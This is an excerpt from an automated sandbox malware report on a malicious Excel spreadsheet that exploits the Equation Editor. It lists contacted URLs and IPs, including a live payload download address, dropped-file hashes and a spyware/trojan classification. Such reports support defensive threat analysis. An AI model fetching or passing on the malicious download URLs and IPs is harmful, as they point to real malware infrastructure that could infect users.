https://ac.ecosia.org/autocomplete?q= vbc.exe, 00000005.00000002.547682339.000000000240F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.548320280.000000000273A000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.547781188.000000000247D000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.548682456.0000000002814000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.548467689.00000000027A7000.00000004.00000800.00020000.00000000.sdmp, tmp7551.tmp.5.dr, tmp71C5.tmp.5.dr, tmp764C.tmp.5.dr, tmp7718.tmp.5.dr, tmp7AA5.tmp.5.dr, tmp7841.tmp.5.dr, tmp7486.tmp.5.dr, tmp738B.tmp.5.dr, tmp790D.tmp.5.dr, tmp7108.tmp.5.dr, tmp79D9.tmp.5.dr, tmp72BF.tmp.5.dr

false high

crl.pkioverheid.nl/DomOvLatestCRL.crl0 vbc.exe, 00000004.00000002.498357684.00000000006EA000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.547399918.00000000008B2000.00000004.00000020.00020000.00000000.sdmp

false URL Reputation: safe unknown

schemas.xmlsoap.org/ws/2004/08/addressing vbc.exe, 00000005.00000002.547487250.0000000002311000.00000004.00000800.00020000.00000000.sdmp

false high

tempuri.org/Endpoint/GetUpdatesResponse vbc.exe, 00000005.00000002.547487250.0000000002311000.00000004.00000800.00020000.00000000.sdmp

false URL Reputation: safe unknown

https://cdn.discordapp.com/attachments/926046144130351104/945362888414072923/httpsgithub.comrakam-io

vbc.exe, 00000004.00000002.498357684.00000000006EA000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000004.00000002.498497574.0000000002311000.00000004.00000800.00020000.00000000.sdmp

false high


tempuri.org/Endpoint/EnvironmentSettingsResponse vbc.exe, 00000005.00000002.547487250.0000000002311000.00000004.00000800.00020000.00000000.sdmp

false URL Reputation: safe unknown

ns.adobe. vbc.exe, 00000005.00000002.547155081.0000000000797000.00000004.00000020.00020000.00000000.sdmp

false URL Reputation: safe unknown

https://api.ipify. vbc.exe true Avira URL Cloud: safe unknown

https://secure.comodo.com/CPS0 vbc.exe, 00000004.00000002.498357684.00000000006EA000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.547399918.00000000008B2000.00000004.00000020.00020000.00000000.sdmp

false high

https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=

vbc.exe, 00000005.00000002.547682339.000000000240F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.548320280.000000000273A000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.547781188.000000000247D000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.548682456.0000000002814000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.548467689.00000000027A7000.00000004.00000800.00020000.00000000.sdmp, tmp7551.tmp.5.dr, tmp71C5.tmp.5.dr, tmp764C.tmp.5.dr, tmp7718.tmp.5.dr, tmp7AA5.tmp.5.dr, tmp7841.tmp.5.dr, tmp7486.tmp.5.dr, tmp738B.tmp.5.dr, tmp790D.tmp.5.dr, tmp7108.tmp.5.dr, tmp79D9.tmp.5.dr, tmp72BF.tmp.5.dr

false high

olypath.comP vbc.exe, 00000004.00000002.498573662.0000000002350000.00000004.00000800.00020000.00000000.sdmp

false Avira URL Cloud: safe unknown

tempuri.org/h vbc.exe, 00000005.00000002.547529132.0000000002357000.00000004.00000800.00020000.00000000.sdmp

true Avira URL Cloud: phishing unknown

crl.entrust.net/2048ca.crl0 vbc.exe, 00000004.00000002.498357684.00000000006EA000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.547399918.00000000008B2000.00000004.00000020.00020000.00000000.sdmp

false high

https://api.ipify.orgcoo vbc.exe true Avira URL Cloud: safe unknown

schemas.xmlsoap.org/soap/actor/next vbc.exe, 00000005.00000002.547487250.0000000002311000.00000004.00000800.00020000.00000000.sdmp

false high

https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=

vbc.exe, 00000005.00000002.547682339.000000000240F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.548320280.000000000273A000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.547781188.000000000247D000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.548682456.0000000002814000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.548467689.00000000027A7000.00000004.00000800.00020000.00000000.sdmp, tmp7551.tmp.5.dr, tmp71C5.tmp.5.dr, tmp764C.tmp.5.dr, tmp7718.tmp.5.dr, tmp7AA5.tmp.5.dr, tmp7841.tmp.5.dr, tmp7486.tmp.5.dr, tmp738B.tmp.5.dr, tmp790D.tmp.5.dr, tmp7108.tmp.5.dr, tmp79D9.tmp.5.dr, tmp72BF.tmp.5.dr

false high

Name Source Malicious Antivirus Detection Reputation

World Map of Contacted IPs

Public IPs

IP | Domain | Country | ASN | ASN Name | Malicious

162.159.130.233 | cdn.discordapp.com | United States | 13335 | CLOUDFLARENETUS | false

178.18.193.160 | olypath.com | Turkey | 50941 | VARGONENTR | false

179.43.175.99 | unknown | Panama | 51852 | PLI-ASCH | true

103.171.0.134 | unknown | unknown | 7575 | AARNET-AS-APAustralianAcademicandResearchNetworkAARNe | true

General Information

Joe Sandbox Version: 34.0.0 Boulder Opal

Analysis ID: 576509

Start date: 22.02.2022

Start time: 15:29:06

Joe Sandbox Product: CloudBasic

Overall analysis duration: 0h 9m 23s

Hypervisor based Inspection enabled: false

Report type: light

Sample file name: POAT2076452.xlsx

Cookbook file name: defaultwindowsofficecookbook.jbs

Analysis system description: Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)

Number of new started processes analysed: 8

Number of new started drivers analysed: 0

Number of existing processes analysed: 0

Number of existing drivers analysed: 0

Number of injected processes analysed: 0

Technologies: HCA enabled, EGA enabled, HDC enabled, AMSI enabled

Analysis Mode: default

Analysis stop reason: Timeout

Detection: MAL

Classification: mal100.troj.spyw.expl.evad.winXLSX@6/46@4/4

EGA Information: Successful, ratio: 100%

HDC Information: Successful, ratio: 1.6% (good quality ratio 1.4%); Quality average: 61.5%; Quality standard deviation: 25.1%

HCA Information: Successful, ratio: 98%; Number of executed functions: 0; Number of non-executed functions: 0

Cookbook Comments: Adjust boot time; Enable AMSI; Found application associated with file extension: .xlsx; Found Word or Excel or PowerPoint or XPS Viewer; Attach to Office via COM; Scroll down; Close Viewer

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe

TCP Packets have been reduced to 100

Excluded IPs from analysis (whitelisted): 104.26.12.31, 104.26.13.31, 172.67.75.172

Excluded domains from analysis (whitelisted): api.ip.sb.cdn.cloudflare.net

Not all processes were analyzed, report is missing behavior information

Report size getting too big, too many NtOpenKeyEx calls found.

Report size getting too big, too many NtQueryDirectoryFile calls found.

Report size getting too big, too many NtQueryValueKey calls found.

VT rate limit hit for: POAT2076452.xlsx

Simulations

Behavior and APIs

Time | Type | Description

15:29:48 | API Interceptor | 55x Sleep call for process: EQNEDT32.EXE modified

15:29:51 | API Interceptor | 273x Sleep call for process: vbc.exe modified

Joe Sandbox View / Context

IPs

⊘ No context

Domains

⊘ No context

ASNs

⊘ No context

JA3 Fingerprints

⊘ No context

Dropped Files

⊘ No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.win32[1].exe

Process: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File Type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows

Category: downloaded

Size (bytes): 14336

Entropy (8bit): 5.171700803602097

Encrypted: false

SSDEEP: 192:uYzXW2Cwl0D1p62Ojdu8kYfDOJSxYINAJ5:uYbWkGXOjdu8k4DOY6TJ

MD5: 980EC4304344F277D722024ADE08CD01

SHA1: DBA030AEE01753EA3E5EF7C9E73725A306B6DBA5

SHA-256: 1BF69A60DFFFB6903E317E5D5DDC9DFCF24C250B6A2DEB9749785C509A986105

SHA-512: 222CAA856AB958EB7E0DF8AD41F0C9A5CE3EDD00FC10896058FB38A73A6CB897E3785862F0F1CD963D65CF5FE90E0E1A3A66E84F70C4BAF16762BC9192EEAD68

Malicious: true

Antivirus: Joe Sandbox ML, Detection: 100%; ReversingLabs, Detection: 7%

Reputation: low

IE Cache URL: 103.171.0.134/_spaceX2__/.win32.exe

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\34F90E45.png

Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File Type: PNG image data, 413 x 220, 8-bit/color RGBA, non-interlaced

Category: dropped

Size (bytes): 10202

Entropy (8bit): 7.870143202588524

Encrypted: false

SSDEEP: 192:hxKBFo46X6nPHvGePo6ylZ+c5xlYYY5spgpb75DBcld7jcnM5b:b740IylZ+c5xlYF5Sgd7tBednd

MD5: 66EF10508ED9AE9871D59F267FBE15AA

SHA1: E40FDB09F7FDA69BD95249A76D06371A851F44A6

SHA-256: 461BABBDFFDCC6F4CD3E3C2C97B50DDAC4800B90DDBA35F1E00E16C149A006FD

SHA-512: 678656042ECF52DAE4132E3708A6916A3D040184C162DF74B78C8832133BCD3B084A7D03AC43179D71AD9513AD27F42DC788BCBEE2ACF6FF5E7FEB5C3648B305

Malicious: false

Reputation: high, very likely benign file

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4FE9EF17.png

Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File Type: PNG image data, 413 x 220, 8-bit/color RGBA, non-interlaced

Category: dropped

Size (bytes): 10202

Entropy (8bit): 7.870143202588524

Encrypted: false

SSDEEP: 192:hxKBFo46X6nPHvGePo6ylZ+c5xlYYY5spgpb75DBcld7jcnM5b:b740IylZ+c5xlYF5Sgd7tBednd

MD5: 66EF10508ED9AE9871D59F267FBE15AA

SHA1: E40FDB09F7FDA69BD95249A76D06371A851F44A6

SHA-256: 461BABBDFFDCC6F4CD3E3C2C97B50DDAC4800B90DDBA35F1E00E16C149A006FD

SHA-512: 678656042ECF52DAE4132E3708A6916A3D040184C162DF74B78C8832133BCD3B084A7D03AC43179D71AD9513AD27F42DC788BCBEE2ACF6FF5E7FEB5C3648B305

Malicious: false

Reputation: high, very likely benign file

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\51123782.png

Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File Type: PNG image data, 139 x 180, 8-bit colormap, non-interlaced

Category: dropped

Size (bytes): 3747

Entropy (8bit): 7.932023348968795

Encrypted: false

SSDEEP: 96:4apPN/1Cb2ItR9rXu7p6mtnOCRxMJZtFtQcgBF5c2SGA:1Pp1kRROtrRxSyRjST1

MD5: 5EB99F38CB355D8DAD5E791E2A0C9922

SHA1: 83E61CDD048381C86E3C3EFD19EB9DAFE743ADBA

SHA-256: 5DAC97FDBD2C2D5DFDD60BF45F498BB6B218D8BFB97D0609738D5E250EBBB7E0

SHA-512: 80F32B5740ECFECC5B084DF2C5134AFA8653D79B91381E62A6F571805A6B44D52D6FD261A61A44C33364123E191D974B87E3FEDC69E7507B9927936B79570C86

Malicious: false

Reputation: moderate, very likely benign file

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\540F5A54.png

Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File Type: PNG image data, 458 x 211, 8-bit/color RGB, non-interlaced

Category: dropped

Size (bytes): 11303

Entropy (8bit): 7.909402464702408

Encrypted: false

SSDEEP: 192:O64BSHRaEbPRI3iLtF0bLLbEXavJkkTx5QpBAenGIC1bOgjBS6UUijBswpJuaUSt:ODy31IAj0bL/EKvJkVFgFg6UUijOmJJN

MD5: 9513E5EF8DDC8B0D9C23C4DFD4AEECA2

SHA1: E7FC283A9529AA61F612EC568F836295F943C8EC

SHA-256: 88A52F8A0BDE5931DB11729D197431148EE9223B2625D8016AEF0B1A510EFF4C

SHA-512: 81D1FE0F43FE334FFF857062BAD1DFAE213EED860D5B2DD19D1D6875ACDF3FC6AB82A43E46ECB54772D31B713F07A443C54030C4856FC4842B4C31269F61346D

Malicious: false

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\597D09DF.png

Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File Type: PNG image data, 150 x 150, 8-bit/color RGBA, non-interlaced

Category: dropped

Size (bytes): 5396

Entropy (8bit): 7.915293088075047

Encrypted: false

SSDEEP: 96:f8W/+DRQgDhhXoFGUAAX5QLwh9eDYfaiy3cHIOZ7NLXgGFMtu4vPWY1TIwD4i:f8agQgDhhXoFGUP2Lwh98YfaxcHIOPLo

MD5: 590B1C3ECA38E4210C19A9BCBAF69F8D

SHA1: 556C229F539D60F1FF434103EC1695C7554EB720

SHA-256: E26F068512948BCE56B02285018BB72F13EEA9659B3D98ACC8EEBB79C42A9969

SHA-512: 481A24A32C9D9278A8D3C7DB86CAC30303F11C8E127C3BB004B9D5E6EDDF36830BF4146E35165DF9C0D0FB8C993679A067311D2BA3713C7E0C22B5470862B978

Malicious: false

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9D634E2C.png

Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File Type: PNG image data, 139 x 180, 8-bit colormap, non-interlaced

Category: dropped

Size (bytes): 3747

Entropy (8bit): 7.932023348968795

Encrypted: false

SSDEEP: 96:4apPN/1Cb2ItR9rXu7p6mtnOCRxMJZtFtQcgBF5c2SGA:1Pp1kRROtrRxSyRjST1

MD5: 5EB99F38CB355D8DAD5E791E2A0C9922

SHA1: 83E61CDD048381C86E3C3EFD19EB9DAFE743ADBA

SHA-256: 5DAC97FDBD2C2D5DFDD60BF45F498BB6B218D8BFB97D0609738D5E250EBBB7E0

SHA-512: 80F32B5740ECFECC5B084DF2C5134AFA8653D79B91381E62A6F571805A6B44D52D6FD261A61A44C33364123E191D974B87E3FEDC69E7507B9927936B79570C86

Malicious: false

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A5A50888.emf

Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File Type: Windows Enhanced Metafile (EMF) image data version 0x10000

Category: dropped

Size (bytes): 1099960

Entropy (8bit): 2.0153141692634335

Encrypted: false

SSDEEP: 3072:nXtr8tV3Iqf4ZdAt06J6dabLr92W2qtX2cT:tahIFdyiaT2qtXl

MD5: 8933AD2DEA3390B99DDB8AB58199F107

SHA1: 0B63D26D4874E10E225810BAD34C61E81F4295C0

SHA-256: 38209C7C7C296B024FB42ECAB403D1835E7F193F27D82D14EA38FE94505F0F76

SHA-512: 214434AB87550A250F1F3E201C07FC993D204DCDC88C6B4CAE5EFA495541FC5CA999F0ED835E79E3965AB5DCB166D3B6065F167658069F4B5E4F9F2F56FDB7A7

Malicious: false

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\AF292561.png

Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File Type: PNG image data, 150 x 150, 8-bit/color RGBA, non-interlaced

Category: dropped

Size (bytes): 5396

Entropy (8bit): 7.915293088075047

Encrypted: false

SSDEEP: 96:f8W/+DRQgDhhXoFGUAAX5QLwh9eDYfaiy3cHIOZ7NLXgGFMtu4vPWY1TIwD4i:f8agQgDhhXoFGUP2Lwh98YfaxcHIOPLo

MD5: 590B1C3ECA38E4210C19A9BCBAF69F8D

SHA1: 556C229F539D60F1FF434103EC1695C7554EB720

SHA-256: E26F068512948BCE56B02285018BB72F13EEA9659B3D98ACC8EEBB79C42A9969

SHA-512: 481A24A32C9D9278A8D3C7DB86CAC30303F11C8E127C3BB004B9D5E6EDDF36830BF4146E35165DF9C0D0FB8C993679A067311D2BA3713C7E0C22B5470862B978

Malicious: false

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\BEDCE7D6.jpeg

Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File Type: JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 160x160, frames 3

Category: dropped

Size (bytes): 4396

Entropy (8bit): 7.884233298494423

Encrypted: false

SSDEEP: 96:1rQzp0lms5HqrrVflQ9MS5Bmy9CSKgpEfSgHk4oPQwb/BD+qSzAGW:1UF0EmEiSS3mKbbpDSk4oYwbBD+qKAX

MD5: 22FEC44258BA0E3A910FC2A009CEE2AB

SHA1: BF6749433E0DBCDA3627C342549C8A8AB3BF51EB

SHA-256: 5CD7EA78DE365089DDDF47770CDECF82E1A6195C648F0DB38D5DCAC26B5C4FA5

SHA-512: 8ED1D2EE0C79AFAB19F47EC4DE880C93D5700DB621ACE07D82F32FA3DB37704F31BE2314A7A5B55E4913131BCA85736C9AC3CB5987BEE10F907376D76076E7CA

Malicious: false

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CBBC9D9B.png

Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File Type: PNG image data, 139 x 180, 8-bit colormap, non-interlaced

Category: dropped

Size (bytes): 2647

Entropy (8bit): 7.8900124483490135

Encrypted: false

SSDEEP: 48:H73wCcD5X+ajENpby1MTln0V1oPd8V8EAWG09tXIa1iBINm4YwFi9:H73KAajQPiMWJG08a1qINm4jU9

MD5: E46357D82EBC866EEBDA98FA8F94B385

SHA1: 76C27D89AB2048AE7B56E401DCD1B0449B6DDF05

SHA-256: B77A19A2F45CBEE79DA939F995DBD54905DED5CB31E7DB6A6BE40A7F6882F966

SHA-512: 8EC0060D1E4641243844E596031EB54EE642DA965078B5A3BC0B9E762E25D6DF6D1B05EACE092BA53B3965A29E3D34387A5A74EB3035D1A51E8F2025192468F3

Malicious: false

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E382C2E0.jpeg

Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File Type: JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 160x160, frames 3

Category: dropped

Size (bytes): 4396

Entropy (8bit): 7.884233298494423

Encrypted: false

SSDEEP: 96:1rQzp0lms5HqrrVflQ9MS5Bmy9CSKgpEfSgHk4oPQwb/BD+qSzAGW:1UF0EmEiSS3mKbbpDSk4oYwbBD+qKAX

MD5: 22FEC44258BA0E3A910FC2A009CEE2AB

SHA1: BF6749433E0DBCDA3627C342549C8A8AB3BF51EB

SHA-256: 5CD7EA78DE365089DDDF47770CDECF82E1A6195C648F0DB38D5DCAC26B5C4FA5

SHA-512: 8ED1D2EE0C79AFAB19F47EC4DE880C93D5700DB621ACE07D82F32FA3DB37704F31BE2314A7A5B55E4913131BCA85736C9AC3CB5987BEE10F907376D76076E7CA

Malicious: false

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F0748BEE.png

Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File Type: PNG image data, 458 x 211, 8-bit/color RGB, non-interlaced

Category: dropped

Size (bytes): 11303

Entropy (8bit): 7.909402464702408

Encrypted: false

SSDEEP: 192:O64BSHRaEbPRI3iLtF0bLLbEXavJkkTx5QpBAenGIC1bOgjBS6UUijBswpJuaUSt:ODy31IAj0bL/EKvJkVFgFg6UUijOmJJN

MD5: 9513E5EF8DDC8B0D9C23C4DFD4AEECA2

SHA1: E7FC283A9529AA61F612EC568F836295F943C8EC

SHA-256: 88A52F8A0BDE5931DB11729D197431148EE9223B2625D8016AEF0B1A510EFF4C

SHA-512: 81D1FE0F43FE334FFF857062BAD1DFAE213EED860D5B2DD19D1D6875ACDF3FC6AB82A43E46ECB54772D31B713F07A443C54030C4856FC4842B4C31269F61346D

Malicious: false

Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File Type: PNG image data, 139 x 180, 8-bit colormap, non-interlaced

Category: dropped

Size (bytes): 2647

Entropy (8bit): 7.8900124483490135

Encrypted: false

SSDEEP: 48:H73wCcD5X+ajENpby1MTln0V1oPd8V8EAWG09tXIa1iBINm4YwFi9:H73KAajQPiMWJG08a1qINm4jU9

MD5: E46357D82EBC866EEBDA98FA8F94B385

SHA1: 76C27D89AB2048AE7B56E401DCD1B0449B6DDF05

SHA-256: B77A19A2F45CBEE79DA939F995DBD54905DED5CB31E7DB6A6BE40A7F6882F966

SHA-512: 8EC0060D1E4641243844E596031EB54EE642DA965078B5A3BC0B9E762E25D6DF6D1B05EACE092BA53B3965A29E3D34387A5A74EB3035D1A51E8F2025192468F3

Malicious: false

Preview: .PNG........IHDR.............../....EPLTE.......................o...ttu`aaLML.s;.../-,................~_)$....IDATx..].b.*....Y\.....o..4...bl.6.1...Y.".|.2A@y.../...X.X..X..2X.........o.Xz}go.*m..UT.DK...ukX.....t.%..iB......w.j.1].].m....._)T...Z./.%[email protected]..'$CS:e.K.Un.U.v......*.P.j. .5.N.5,..B]....y..2!..^.?...5..A...>"....)...}.*.....{[e4(.Nn....x.,....t.1..6.....}K).$.I.%n$b..G.g.w.....M..w..B.......tF".YtI..C.s.~)..<@"......-..._.(x...b..C..........;5.=.......c...s.....>.E;g.#.hk.Q..g,o;Z`.$.p&.8..ia...La....~XD.4p...8......HuYw.~X.+&Q.a.H.C..ly..X..a.?O.yS,C.r..........Xbp&.D..1.....c.cp..G.....L.M..2..5...4..L.E..`.`[email protected];...YFN.A.G.8..>aI.I.,...K..t..].FZ...E..F....Do../.d.,..&.f.e!..6.......2.;..gNqH`...X..\...AS...@4...#.....!D}..A_....1.W..".S.A.HIC.I'V...2..~.O.A}[email protected]./...J,.E.....[`I>.F....$v$...:,..H..K.om.E..S29kM/..z.W...hae..62z%}y..q..z...../M.X..)....B eC..........x.C.42u...W...7.7.7

Process: C:\Users\Public\vbc.exe

File Type: ASCII text, with very long lines, with CRLF line terminators

Category: dropped

Size (bytes): 1026

Entropy (8bit): 4.70435191336402

Encrypted: false

SSDEEP: 24:q83Oua2II99Dm5Xcf7kmp5fFjUTZF/+akoYY9fBpCtJ6Wi5v:7OD2ISi5Xcz9l8RkcFCJ6Wix

MD5: 8C1F71001ABC7FCE68B3F15299553CE7

SHA1: 382285FB69081EB79C936BC4E1BFFC9D4697D881

SHA-256: DCC1D5A624022EFCE4D4A919041C499622A1213FD62B848C36E6252EE29B5CAE

SHA-512: 8F2124445F7856BFFBB3E7067135CFA70BFB657F8CEAEE89312CF15CFA127CACF28C2F1F9CD1CC64E56A8D8C248E237F2E97F968D244C457AD95D0AD5144E2A7

Malicious: false

Preview: NHPKIZUUSGERQSLBGSEAVXGNDWXNHRIMGKQZIYGMNAKLDSDLMZTSHWNQSMRLTOXKIQVZWPTPMYGCCCTOQMOFGPYVVCCUDORIXMMXDHKCETULBHLJENABEIJPTFOHFPIUUSFPUHSBHENDANFMOYZRZAXYVFEZIKDKUEVZAWEFKRTUJZPFUDMEZZQVBGYMMIHKEBYJMJMTTXSDTDQAUATXLABLBEJUBBPSXZPXMHVNHOHYPKCYLDVGJSBPEXWGYVPHWPWLYJIOFFNQHAOBSRORLXUKIHEETKPFDPHQAGTKOMEWPBYGMTXHOQFINPIQARIVGCFUFIETTFUMCUDHRHCSTIZWRDJEHWOLAFOSWAVIGSWONBSKFWHCQAGHLWBKAFUQUULJRVZNUGGVOCCVTTWZEZFPJKZDJMHDYXQKDPLRECPAAEZVBXFDGZJIUGNMOEAISGBSPVTDRADHODLAXUFWZVTJPIGKERLENNAJHHHNNAPBWXCOGJSNVQJJEEPSMESQKGYOHXVMZQNSMSJHQHSGCJZCBZJXMLGNQQKZRIQSQCAWXZFCRMGMMLKHZDWNQTXPTYWGWNQQEQWEZJPQVPOASQIIJYWPUVLHFSLMGHWITYEKRNYGXYTAJZSRGYUWTMRNOICIEPMAYUOIDDOUSYSPAILYQQLYDTBOTEDGSCNXDRRQMOBWCQMDCQXTPEXDKPLVRMFZSKERSAULAYLSOJGDMFTZECKZYYLQVVDOMXISCOBUPPSAYUFOWOCBDJALHRAXDIKEMRYGQMEYTENAHXKWSVJEDEJTIUWZDHLIBKQRVMQLSAYIIOZDWWOLHCJUVJVRYJLTIENWCTYDOSJVSFUHOQPOXCMFGTAWFRCZJNYBCRPUFRUMZIBQDOVOBMFCHMMFHSSJZDCZNMWNCNSQMZWHCOEYNCAFONSABBQCKAPFWJIGKNUCUJZWUKRWIOFVWQWFSYAHDWXEMJKFZYMRVIRAMPVKBXONBJFTXIBDAYIE

Process: C:\Users\Public\vbc.exe

File Type: ASCII text, with very long lines, with CRLF line terminators

Category: dropped

Size (bytes): 1026

Entropy (8bit): 4.690067217069288

Encrypted: false

SSDEEP: 12:wSQanHEC73FqjThUbJwuUn5qPyd2whRZfZOaH5KrqXzJI/y5bjbVMmRYAPL8fx7T:wHu73FWhUNwzqq2OfX82JdHRNPLcxdl

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F9EE9.png

C:\Users\user\AppData\Local\Temp\tmp3E26.tmp

C:\Users\user\AppData\Local\Temp\tmp3EE2.tmp

Copyright Joe Security LLC 2022 Page 21 of 65

MD5: 4E32787C3D6F915D3CB360878174E142

SHA1: 57FF84FAEDF66015F2D79E1BE72A29D7B5643F47

SHA-256: 2BCD2A46D2DCED38DE96701E6D3477D8C9F4456FFAE5135C0605C8434BA60269

SHA-512: CEC75D7CCFA70705732826C202D144A8AC913E7FCFE0D9B54F6A0D1EEC3253B6DEFFB91E551586DA15F56BA4DE8030AC23EE28B16BB80D1C5F1CB6BECF9C21BE

Malicious: false

Preview:

Process: C:\Users\Public\vbc.exe

File Type: ASCII text, with very long lines, with CRLF line terminators

Category: dropped

Size (bytes): 1026

Entropy (8bit): 4.70435191336402

Encrypted: false

SSDEEP: 24:q83Oua2II99Dm5Xcf7kmp5fFjUTZF/+akoYY9fBpCtJ6Wi5v:7OD2ISi5Xcz9l8RkcFCJ6Wix

MD5: 8C1F71001ABC7FCE68B3F15299553CE7

SHA1: 382285FB69081EB79C936BC4E1BFFC9D4697D881

SHA-256: DCC1D5A624022EFCE4D4A919041C499622A1213FD62B848C36E6252EE29B5CAE

SHA-512: 8F2124445F7856BFFBB3E7067135CFA70BFB657F8CEAEE89312CF15CFA127CACF28C2F1F9CD1CC64E56A8D8C248E237F2E97F968D244C457AD95D0AD5144E2A7

Malicious: false

Preview: NHPKIZUUSGERQSLBGSEAVXGNDWXNHRIMGKQZIYGMNAKLDSDLMZTSHWNQSMRLTOXKIQVZWPTPMYGCCCTOQMOFGPYVVCCUDORIXMMXDHKCETULBHLJENABEIJPTFOHFPIUUSFPUHSBHENDANFMOYZRZAXYVFEZIKDKUEVZAWEFKRTUJZPFUDMEZZQVBGYMMIHKEBYJMJMTTXSDTDQAUATXLABLBEJUBBPSXZPXMHVNHOHYPKCYLDVGJSBPEXWGYVPHWPWLYJIOFFNQHAOBSRORLXUKIHEETKPFDPHQAGTKOMEWPBYGMTXHOQFINPIQARIVGCFUFIETTFUMCUDHRHCSTIZWRDJEHWOLAFOSWAVIGSWONBSKFWHCQAGHLWBKAFUQUULJRVZNUGGVOCCVTTWZEZFPJKZDJMHDYXQKDPLRECPAAEZVBXFDGZJIUGNMOEAISGBSPVTDRADHODLAXUFWZVTJPIGKERLENNAJHHHNNAPBWXCOGJSNVQJJEEPSMESQKGYOHXVMZQNSMSJHQHSGCJZCBZJXMLGNQQKZRIQSQCAWXZFCRMGMMLKHZDWNQTXPTYWGWNQQEQWEZJPQVPOASQIIJYWPUVLHFSLMGHWITYEKRNYGXYTAJZSRGYUWTMRNOICIEPMAYUOIDDOUSYSPAILYQQLYDTBOTEDGSCNXDRRQMOBWCQMDCQXTPEXDKPLVRMFZSKERSAULAYLSOJGDMFTZECKZYYLQVVDOMXISCOBUPPSAYUFOWOCBDJALHRAXDIKEMRYGQMEYTENAHXKWSVJEDEJTIUWZDHLIBKQRVMQLSAYIIOZDWWOLHCJUVJVRYJLTIENWCTYDOSJVSFUHOQPOXCMFGTAWFRCZJNYBCRPUFRUMZIBQDOVOBMFCHMMFHSSJZDCZNMWNCNSQMZWHCOEYNCAFONSABBQCKAPFWJIGKNUCUJZWUKRWIOFVWQWFSYAHDWXEMJKFZYMRVIRAMPVKBXONBJFTXIBDAYIE

Process: C:\Users\Public\vbc.exe

File Type: ASCII text, with very long lines, with CRLF line terminators

Category: dropped

Size (bytes): 1026

Entropy (8bit): 4.690067217069288

Encrypted: false

SSDEEP: 12:wSQanHEC73FqjThUbJwuUn5qPyd2whRZfZOaH5KrqXzJI/y5bjbVMmRYAPL8fx7T:wHu73FWhUNwzqq2OfX82JdHRNPLcxdl

MD5: 4E32787C3D6F915D3CB360878174E142

SHA1: 57FF84FAEDF66015F2D79E1BE72A29D7B5643F47

SHA-256: 2BCD2A46D2DCED38DE96701E6D3477D8C9F4456FFAE5135C0605C8434BA60269

SHA-512: CEC75D7CCFA70705732826C202D144A8AC913E7FCFE0D9B54F6A0D1EEC3253B6DEFFB91E551586DA15F56BA4DE8030AC23EE28B16BB80D1C5F1CB6BECF9C21BE

Malicious: false

